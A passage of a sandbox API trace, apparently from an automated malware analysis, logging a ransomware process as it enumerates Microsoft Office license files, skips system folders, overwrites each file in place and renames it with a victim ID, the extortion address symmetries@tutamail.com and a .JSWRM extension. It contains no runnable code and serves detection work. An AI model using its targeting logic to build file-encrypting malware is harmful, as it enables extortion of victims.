files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.061] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7345a77, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7345a77, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe74c3217, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", cAlternateFileName="O35141~1.XRM")) returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2=".") returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="..") returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="...") returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="windows") returned -1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.061] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0106.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0106.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0106.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0106.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.062] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23843) returned 1 [0106.062] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d20) returned 0x24c1d0 [0106.062] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d20, lpOverlapped=0x0) returned 1 [0106.066] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.066] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d20, lpOverlapped=0x0) returned 1 [0106.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.066] CloseHandle (hObject=0x45c) returned 1 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0106.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0106.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0106.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.067] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.068] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe742a8a9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe742a8a9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe74e9435, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", cAlternateFileName="O3906D~1.XRM")) returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.068] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0106.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0106.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.069] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11655) returned 1 [0106.069] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.069] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.084] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.084] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.084] CloseHandle (hObject=0x45c) returned 1 [0106.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0106.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0106.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0106.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0106.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0106.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.086] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7391ec8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7391ec8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7476d1f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial4-pl.xrm-ms", cAlternateFileName="O32814~1.XRM")) returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2=".") returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="..") returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="...") returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="windows") returned -1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="recovery") returned -1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.086] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpString2="msocache") returned 1 [0106.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0106.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0106.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0106.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0106.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0106.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0106.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0106.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0106.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.087] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11199) returned 1 [0106.087] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0106.087] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.089] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.089] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.090] CloseHandle (hObject=0x45c) returned 1 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.090] HeapFree (in: hHeap=0x1e0000, 